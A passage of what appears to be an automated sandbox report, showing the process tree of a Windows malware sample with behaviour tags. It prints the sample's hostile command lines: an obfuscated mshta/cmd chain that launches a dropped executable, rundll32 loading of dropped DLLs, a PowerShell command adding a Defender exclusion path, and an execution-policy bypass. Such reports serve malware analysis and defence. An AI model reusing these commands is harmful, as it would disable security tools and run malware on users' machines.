      "C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\Documents\CsvQH9d6ULiQiaCR4F5na_NG.exe" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "" == "" for %Q in ("C:\Users\Admin\Documents\CsvQH9d6ULiQiaCR4F5na_NG.exe" ) do taskkill -F -im "%~NxQ"
      4⤵
      PID:5044
    - - C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE
        
        BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1
        5⤵
        
        PID:5372
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBSCripT: CloSe ( CReateOBjecT ("wSCRipT.sheLl"). RUN ( "cmD /q /C TYPe ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" > Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF ""-PyTJSIPDC12bsxp0f1 "" == """" for %Q in ( ""C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE"" ) do taskkill -F -im ""%~NxQ"" ", 0, truE) )
        6⤵
        
        PID:5752
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /q /C TYPe "C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" >Bx0IuOFB.ExE && StArT BX0iUoFB.EXe -PyTJSIPDC12bsxp0f1 & iF "-PyTJSIPDC12bsxp0f1 " == "" for %Q in ("C:\Users\Admin\AppData\Local\Temp\Bx0IuOFB.ExE" ) do taskkill -F -im "%~NxQ"
        7⤵
        
        PID:4924
      - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" .\BPJm7xC.Iwa,Rgac
        6⤵
        
        PID:5976
    - - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -F -im "CsvQH9d6ULiQiaCR4F5na_NG.exe"
        5⤵
        Kills process with taskkill
        
        PID:5864
- C:\Users\Admin\Documents\Uc7rdCQBCO1fW2kipYOL3jAE.exe
  "C:\Users\Admin\Documents\Uc7rdCQBCO1fW2kipYOL3jAE.exe"
  2⤵
  - Executes dropped EXE
  PID:2196
- C:\Users\Admin\Documents\72k5LEDsMsYjsptSJm_DD9kJ.exe
  "C:\Users\Admin\Documents\72k5LEDsMsYjsptSJm_DD9kJ.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:2152
- C:\Users\Admin\Documents\utRItAmEi1Z_voLcTDUfgkZf.exe
  "C:\Users\Admin\Documents\utRItAmEi1Z_voLcTDUfgkZf.exe"
  2⤵
  - Executes dropped EXE
  PID:4020
- C:\Users\Admin\Documents\FLWA1mmWx4glOCq18m3UoXOz.exe
  "C:\Users\Admin\Documents\FLWA1mmWx4glOCq18m3UoXOz.exe"
  2⤵
  - Executes dropped EXE
  PID:3908
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3908 -s 480
    3⤵
    - Suspicious use of NtCreateProcessExOtherParentProcess
    - Program crash
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2612
- C:\Users\Admin\Documents\ONbSOy_qrkUCbNaBoe0LqBDc.exe
  "C:\Users\Admin\Documents\ONbSOy_qrkUCbNaBoe0LqBDc.exe"
  2⤵
  - Executes dropped EXE
  PID:2076
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\ONBSOY~1.DLL,s C:\Users\Admin\DOCUME~1\ONBSOY~1.EXE
    3⤵
    PID:4912
  - - C:\Windows\SysWOW64\RUNDLL32.EXE
      C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\ONBSOY~1.DLL,gi1VUzI=
      4⤵
      PID:2604
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\ONBSOY~1.DLL
        5⤵
        
        PID:9336
    - - C:\Windows\SysWOW64\RUNDLL32.EXE
        
        C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\ONBSOY~1.DLL,MAEuWUY=
        5⤵
        
        PID:10860
      - C:\Windows\system32\rundll32.exe
        
        C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 31804
        6⤵
        
        PID:6068
        
        C:\Windows\system32\ctfmon.exe
        
        ctfmon.exe
        7⤵
        
        PID:10488
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp1599.tmp.ps1"
        5⤵
        
        PID:3528
- C:\Users\Admin\Documents\ySEdxtSvRnggSdtdR3bDeb0H.exe
  "C:\Users\Admin\Documents\ySEdxtSvRnggSdtdR3bDeb0H.exe"
  2⤵
  - Executes dropped EXE
  - Checks BIOS information in registry
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  PID:3212
- C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
  "C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3612
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    - Executes dropped EXE
    PID:4856
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:3792
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:4736
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    - Executes dropped EXE
    PID:4320
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:1880
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:2344
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:5416
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:4864
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:2884
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:4444
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:4296
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:5044
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:4924
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:6452
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:6856
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:6256
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:2032
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:6544
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:6620
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:5204
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:7672
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:5432
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:8008
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:7884
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:7144
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:5172
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:7876
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:8392
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:9004
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:8232
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:9204
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:2120
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:7440
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:9076
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:2756
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:9368
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:9804
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:10208
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:9696
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:10216
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:2624
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:10112
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:9516
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:10432
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:10772
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:11208
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:10752
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:9956
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:11128
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:3068
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:6256
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:5464
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:11520
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:11932
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:12260
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:11624
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:12024
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:7288
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:8356
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:7176
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:10956
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:12300
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:12744
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:6944
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:13180
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:9412
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:13272
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:13948
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:14184
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:3556
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:3892
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:14272
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:10116
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:11064
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:13352
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:13632
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:14412
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:14920
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:15240
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:14560
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:7296
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:6124
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:15448
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:15764
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:16128
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:14680
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:15872
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:15528
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:14980
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:11532
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:13288
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:11816
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:14684
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:15552
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:14308
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:15120
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:16048
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:13432
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:16580
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:17000
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:17284
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:16624
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:15976
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:11248
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:16192
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:13944
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:16808
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:17060
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:15408
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:11960
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:17508
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:17816
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:17932
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:18092
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:18328
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:17624
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:17888
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:18188
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:17528
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:15632
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:11884
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:4792
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:18264
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:17492
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:12044
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:9544
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:18292
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:2028
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
    3⤵
    PID:16220
- - C:\Users\Admin\Documents\payZSMEtryi_KTquJ7dRMVqq.exe
